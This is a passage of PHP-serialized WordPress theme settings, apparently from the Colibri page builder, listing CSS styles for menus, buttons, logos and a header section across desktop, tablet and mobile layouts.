auto;\n}\n\";}}i:453;a:5:{s:13:\"local-453-c13\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:96:\"#colibri .style-local-453-c13-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"local-453-c16\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-453-c4\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-453-c4-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-453-c6\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-453-c6-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-453-c8\";a:3:{s:7:\"desktop\";s:97:\"#colibri .style-local-453-c8-outer {\n  width: 80.60% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"tablet\";s:54:\"#colibri .style-local-453-c8-outer {\n  width: 70% ;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-453-c8-outer {\n  width: 100% ;\n}\n\";}}i:1573;a:1:{s:13:\"local-1573-c4\";a:1:{s:7:\"desktop\";s:96:\"#colibri .style-local-1573-c4-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}}}s:7:\"cssById\";a:605:{i:1;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:2;a:3:{s:7:\"desktop\";s:428:\"#colibri .style-2 {\n  animation-duration: 0.5s;\n  padding-top: 20px;\n  padding-right: 15px;\n  padding-bottom: 20px;\n  padding-left: 15px;\n  background-color: transparent;\n  background-image: none;\n}\n#colibri .h-navigation_sticky .style-2,#colibri .h-navigation_sticky.style-2 {\n  background-color: #ffffff;\n  background-image: none;\n  padding-top: 10px;\n  padding-bottom: 10px;\n  box-shadow: 0px 0px 4px 0px rgba(0,0,0,0.5) ;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:189:\"#colibri .style-2 {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n#colibri .h-navigation_sticky .style-2,#colibri .h-navigation_sticky.style-2 {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";}i:3;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:4;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-4 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:5;a:3:{s:7:\"desktop\";s:557:\"#colibri .style-5-image {\n  max-height: 70px;\n}\n#colibri .style-5 .logo-text {\n  color: #FFFFFF;\n}\n#colibri .style-5 a,#colibri .style-5  .logo-text {\n  color: #ffffff;\n  text-decoration: none;\n  font-size: 24px;\n}\n#colibri .h-navigation_sticky .style-5-image,#colibri .h-navigation_sticky.style-5-image {\n  max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-5 a,#colibri .h-navigation_sticky .style-5  .logo-text,#colibri .h-navigation_sticky.style-5 a,#colibri .h-navigation_sticky.style-5  .logo-text {\n  color: #000000;\n  text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:6;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-6 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:7;a:3:{s:7:\"desktop\";s:38:\"#colibri .style-7 {\n  height: 50px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:8;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-8 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:9;a:3:{s:7:\"desktop\";s:8521:\"#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a > svg,#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a >  .arrow-wrapper {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu  li > a > svg,#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu  li > a >  .arrow-wrapper {\n  padding-right: 5px;\n  padding-left: 5px;\n  color: black;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n  padding-right: 5px;\n  padding-left: 5px;\n  color: black;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu > li > ul::before {\n  height: 0px;\n  width: 100% ;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu > li > ul {\n  margin-top: 0px;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu.solid-active-item > li::after,#colibri .style-9 \n      ul.colibri-menu.solid-active-item > li::before {\n  background-color: white;\n  background-image: none;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 0%;\n  border-top-right-radius: 0%;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 0%;\n  border-bottom-right-radius: 0%;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .style-9 \n      ul.colibri-menu.bordered-active-item > li::before {\n  background-color: rgb(166, 220, 244);\n  background-image: none;\n  height: 3px;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n  font-size: 14px;\n  color: rgb(37, 41, 42);\n}\n#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover  > a {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover > a,#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover  > a {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n  font-size: 14px;\n  color: rgb(255, 255, 255);\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li {\n  padding-top: 10px;\n  padding-right: 20px;\n  padding-bottom: 10px;\n  padding-left: 20px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgba(128,128,128,.2);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-style: none;\n  background-color: rgb(255, 255, 255);\n  background-image: none;\n}\n#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n  background-color: #03a9f4;\n}\n#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover,#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n  background-color: #03a9f4;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item,#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover {\n  padding-top: 10px;\n  padding-right: 20px;\n  padding-bottom: 10px;\n  padding-left: 20px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgba(128,128,128,.2);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-style: none;\n  background-color: #03a9f4;\n  background-image: none;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu li > ul {\n  background-color: #ffffff;\n  background-image: none;\n  margin-right: 5px;\n  margin-left: 5px;\n  box-shadow: 0px 0px 5px 2px rgba(0, 0, 0, 0.04) ;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 14px;\n  line-height: 1.5em;\n  letter-spacing: 0px;\n  color: #FFFFFF;\n}\n#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: rgb(166, 220, 244);\n}\n#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: rgb(166, 220, 244);\n}\n#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 14px;\n  line-height: 1.5em;\n  letter-spacing: 0px;\n  color: rgb(166, 220, 244);\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu > li {\n  margin-top: 0px;\n  margin-right: 20px;\n  margin-bottom: 0px;\n  margin-left: 20px;\n  padding-top: 10px;\n  padding-right: 0px;\n  padding-bottom: 10px;\n  padding-left: 0px;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item,#colibri .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover {\n  margin-top: 0px;\n  margin-right: 20px;\n  margin-bottom: 0px;\n  margin-left: 20px;\n  padding-top: 10px;\n  padding-right: 0px;\n  padding-bottom: 10px;\n  padding-left: 0px;\n}\n#colibri .style-9 >  div > .colibri-menu-container > ul.colibri-menu {\n  justify-content: flex-end;\n}\n#colibri .h-navigation_sticky .style-9 >  div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky .style-9 \n      ul.colibri-menu.bordered-active-item > li::before,#colibri .h-navigation_sticky.style-9 >  div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky.style-9 \n      ul.colibri-menu.bordered-active-item > li::before {\n  background-color: #03a9f4;\n  background-image: none;\n}\n#colibri .h-navigation_sticky .style-9 >  div > .colibri-menu-container > ul.colibri-menu > li > a,#colibri .h-navigation_sticky.style-9 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  color: rgb(2, 110, 159);\n}\n#colibri .h-navigation_sticky .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a,#colibri .h-navigation_sticky.style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a,#colibri .h-navigation_sticky.style-9  >  div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky.style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky .style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover,#colibri .h-navigation_sticky.style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky.style-9  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:10;a:3:{s:7:\"desktop\";s:928:\"#colibri .style-10-offscreen {\n  background-color: #222B34;\n  background-image: none;\n  width: 300px !important;\n}\n#colibri .style-10-offscreenOverlay {\n  background-color: rgba(0,0,0,0.5);\n  background-image: none;\n}\n#colibri .style-10  .h-hamburger-icon {\n  background-color: rgba(0, 0, 0, 0.1);\n  background-image: none;\n  border-top-width: 0px;\n  border-top-color: black;\n  border-top-style: solid;\n  border-top-left-radius: 100%;\n  border-top-right-radius: 100%;\n  border-right-width: 0px;\n  border-right-color: black;\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: black;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 100%;\n  border-bottom-right-radius: 100%;\n  border-left-width: 0px;\n  border-left-color: black;\n  border-left-style: solid;\n  fill: white;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n  width: 24px;\n  height: 24px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:11;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:12;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:13;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-13 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:14;a:3:{s:7:\"desktop\";s:496:\"#colibri .style-14-image {\n  max-height: 70px;\n}\n#colibri .style-14 a,#colibri .style-14  .logo-text {\n  color: #ffffff;\n  text-decoration: none;\n}\n#colibri .h-navigation_sticky .style-14-image,#colibri .h-navigation_sticky.style-14-image {\n  max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-14 a,#colibri .h-navigation_sticky .style-14  .logo-text,#colibri .h-navigation_sticky.style-14 a,#colibri .h-navigation_sticky.style-14  .logo-text {\n  color: #000000;\n  text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:15;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:16;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-16 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:17;a:3:{s:7:\"desktop\";s:3929:\"#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a > svg,#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a >  .arrow-wrapper {\n  color: white;\n  padding-right: 20px;\n  padding-left: 20px;\n}\n#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n  color: white;\n  padding-right: 20px;\n  padding-left: 20px;\n}\n#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu  li > a > svg,#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu  li > a >  .arrow-wrapper {\n  padding-right: 20px;\n  padding-left: 20px;\n  color: black;\n}\n#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n  padding-right: 20px;\n  padding-left: 20px;\n  color: black;\n}\n#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n  font-size: 14px;\n  color: white;\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n}\n#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-17  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n  font-size: 14px;\n  color: white;\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n}\n#colibri .style-17 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  font-size: 14px;\n  color: white;\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n}\n#colibri .style-17  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-17  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  font-size: 14px;\n  color: white;\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:18;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:19;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:20;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:21;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:22;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:23;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:24;a:3:{s:7:\"desktop\";s:692:\"#colibri .style-24 {\n  height: auto;\n  min-height: unset;\n  color: #FFFFFF;\n  background-color: #03a9f4;\n  background-position: center center;\n  background-size: cover;\n  background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/header-scaled.jpg\");\n  background-attachment: scroll;\n  background-repeat: no-repeat;\n  padding-top: 200px;\n  padding-bottom: 200px;\n}\n#colibri .style-24 h1 {\n  color: #FFFFFF;\n}\n#colibri .style-24 h2 {\n  color: #FFFFFF;\n}\n#colibri .style-24 h3 {\n  color: #FFFFFF;\n}\n#colibri .style-24 h4 {\n  color: #FFFFFF;\n}\n#colibri .style-24 h5 {\n  color: #FFFFFF;\n}\n#colibri .style-24 h6 {\n  color: #FFFFFF;\n}\n#colibri .style-24 p {\n  color: #FFFFFF;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:25;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:26;a:3:{s:7:\"desktop\";s:386:\"#colibri .style-26-outer {\n  width: 80% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n#colibri .style-26 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  border-top-width: 0px;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:27;a:3:{s:7:\"desktop\";s:352:\"#colibri .style-27 p,#colibri .style-27  h1,#colibri .style-27  h2,#colibri .style-27  h3,#colibri .style-27  h4,#colibri .style-27  h5,#colibri .style-27  h6 {\n  font-weight: 600;\n  text-align: center;\n}\n#colibri .style-27 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:28;a:3:{s:7:\"desktop\";s:105:\"#colibri .style-28 ul {\n  list-style-type: disc;\n}\n#colibri .style-28 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:29;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:30;a:3:{s:7:\"desktop\";s:1290:\"#colibri .style-30-icon {\n  width: 14px;\n  height: 14px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n#colibri .style-30 {\n  background-color: #03a9f4;\n  background-image: none;\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 14px;\n  line-height: 1em;\n  letter-spacing: 1px;\n  color: white;\n  border-top-width: 2px;\n  border-top-color: #03a9f4;\n  border-top-style: solid;\n  border-top-left-radius: 56px;\n  border-top-right-radius: 56px;\n  border-right-width: 2px;\n  border-right-color: #03a9f4;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #03a9f4;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 56px;\n  border-bottom-right-radius: 56px;\n  border-left-width: 2px;\n  border-left-color: #03a9f4;\n  border-left-style: solid;\n  padding-top: 15px;\n  padding-right: 30px;\n  padding-bottom: 15px;\n  padding-left: 30px;\n  text-align: center;\n}\n#colibri .style-30:hover,#colibri .style-30:focus {\n  background-color: rgb(2, 110, 159);\n  border-top-color: rgb(2, 110, 159);\n  border-right-color: rgb(2, 110, 159);\n  border-bottom-color: rgb(2, 110, 159);\n  border-left-color: rgb(2, 110, 159);\n}\n#colibri .style-30:active .style-30-icon {\n  width: 14px;\n  height: 14px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:31;a:3:{s:7:\"desktop\";s:1259:\"#colibri .style-31-icon {\n  width: 14px;\n  height: 14px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n#colibri .style-31 {\n  background-color: transparent;\n  background-image: none;\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 14px;\n  line-height: 1em;\n  letter-spacing: 1px;\n  color: white;\n  border-top-width: 2px;\n  border-top-color: white;\n  border-top-style: solid;\n  border-top-left-radius: 56px;\n  border-top-right-radius: 56px;\n  border-right-width: 2px;\n  border-right-color: white;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: white;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 56px;\n  border-bottom-right-radius: 56px;\n  border-left-width: 2px;\n  border-left-color: white;\n  border-left-style: solid;\n  padding-top: 15px;\n  padding-right: 30px;\n  padding-bottom: 15px;\n  padding-left: 30px;\n  text-align: center;\n}\n#colibri .style-31:hover,#colibri .style-31:focus {\n  background-color: rgba(255, 255, 255, 0.25);\n  border-top-color: #FFFFFF;\n  border-right-color: #FFFFFF;\n  border-bottom-color: #FFFFFF;\n  border-left-color: #FFFFFF;\n}\n#colibri .style-31:active .style-31-icon {\n  width: 14px;\n  height: 14px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:32;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-32 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:33;a:3:{s:7:\"desktop\";s:730:\"#colibri .style-33-image {\n  opacity: 1;\n}\n#colibri .style-33-overlay {\n  background-color: unset;\n  background-image: none;\n}\n#colibri .style-33-caption {\n  margin-top: 10px;\n}\n#colibri .style-33-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:34;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:35;a:3:{s:7:\"desktop\";s:431:\"#colibri .style-35 {\n  animation-duration: 0.5s;\n  padding-top: 20px;\n  padding-right: 15px;\n  padding-bottom: 20px;\n  padding-left: 15px;\n  background-color: transparent;\n  background-image: none;\n}\n#colibri .h-navigation_sticky .style-35,#colibri .h-navigation_sticky.style-35 {\n  background-color: #ffffff;\n  background-image: none;\n  padding-top: 10px;\n  padding-bottom: 10px;\n  box-shadow: 0px 0px 4px 0px rgba(0,0,0,0.5) ;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:192:\"#colibri .style-35 {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n#colibri .h-navigation_sticky .style-35,#colibri .h-navigation_sticky.style-35 {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";}i:36;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:37;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-37 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:38;a:3:{s:7:\"desktop\";s:567:\"#colibri .style-38-image {\n  max-height: 70px;\n}\n#colibri .style-38 .logo-text {\n  color: #f6f8fa;\n}\n#colibri .style-38 a,#colibri .style-38  .logo-text {\n  color: #ffffff;\n  text-decoration: none;\n  font-size: 24px;\n}\n#colibri .h-navigation_sticky .style-38-image,#colibri .h-navigation_sticky.style-38-image {\n  max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-38 a,#colibri .h-navigation_sticky .style-38  .logo-text,#colibri .h-navigation_sticky.style-38 a,#colibri .h-navigation_sticky.style-38  .logo-text {\n  color: #000000;\n  text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:39;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-39 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:40;a:3:{s:7:\"desktop\";s:39:\"#colibri .style-40 {\n  height: 50px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:41;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-41 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:42;a:3:{s:7:\"desktop\";s:8573:\"#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a > svg,#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a >  .arrow-wrapper {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n  color: rgb(255, 255, 255);\n}\n#colibri .style-42 >  div > .colibri-menu-container > ul.colibri-menu  li > 